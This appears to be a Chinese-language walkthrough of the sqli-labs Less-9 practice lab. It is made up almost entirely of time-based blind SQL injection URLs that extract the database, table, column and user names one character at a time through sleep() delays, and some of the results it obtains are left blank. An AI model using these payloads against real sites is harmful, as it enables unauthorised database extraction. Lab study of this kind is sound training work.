1. 查看數據庫名的長度(時間盲注:條件爲真時響應延遲約5秒,否則立即返回)
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' AND if(length(database())>7,sleep(5),1)-- +
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' AND if(length(database())>8,sleep(5),1)-- +
2. 查看數據庫名的第一個字符
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if(ascii(substr( database(),1,1) )>114,sleep(5),1)-- +
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if(ascii(substr( database(),1,1) )>115,sleep(5),1)-- +
第二個字符
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if(ascii(substr( database(),2,1) )>101,sleep(5),1)-- +
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if(ascii(substr( database(),2,1) )>100,sleep(5),1)-- +
獲得數據庫名(即下文 table_schema 使用的 security)
3. 獲得表名長度
第一個表的長度
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' AND if(length((select table_name from information_schema.tables where table_schema='security' limit 0,1))>5,sleep(5),1)-- +
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' AND if(length((select table_name from information_schema.tables where table_schema='security' limit 0,1))>6,sleep(5),1)-- +
第二個表的長度
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' AND if(length((select table_name from information_schema.tables where table_schema='security' limit 1,1))>8,sleep(5),1)-- +
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' AND if(length((select table_name from information_schema.tables where table_schema='security' limit 1,1))>7,sleep(5),1)-- +
4. 查看第一個表的第一個字符
http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100,sleep(5),1) --+
http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101,sleep(5),1) --+
第一個表的第二個字符
http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))>109,sleep(5),1) --+
http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))>108,sleep(5),1) --+
5. 查看第二個表的第一個字符
http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))>114,sleep(5),1) --+
http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))>113,sleep(5),1) --+
第二個表的第二個字符
http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),2,1))>101,sleep(5),1) --+
http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),2,1))>100,sleep(5),1) --+
查看第四個表的第一個字符
http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1))>117,sleep(5),1) --+
http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1))>116,sleep(5),1) --+
最後獲得的表有
6. 查看users表第一個列名的長度
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' AND if(length((select column_name from information_schema.columns where table_name='users' limit 0,1))>7,sleep(5),1) --+
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' AND if(length((select column_name from information_schema.columns where table_name='users' limit 0,1))>6,sleep(5),1) --+
7. 查看users表中列名的字符
第一列的第一個字符
http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>117,sleep(5),1) --+
http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>116,sleep(5),1) --+
第一列的第二個字符
http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),2,1))>112,sleep(5),1) --+
http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),2,1))>111,sleep(5),1) --+
獲得列表爲:username,password
8. users表中第一個用戶名的長度。
http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(length((select username from users limit 0,1))=4,sleep(5),1) -- +
第一個用戶名的第一個字符
http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select username from users limit 0,1),1,1))>68,sleep(5),1) --+
http://127.0.0.1/sqli-labs-master/Less-9/?id=1 ' AND if(ascii(substr((select username from users limit 0,1),1,1))>67,sleep(5),1) --+
最後獲得用戶名密碼是:Dump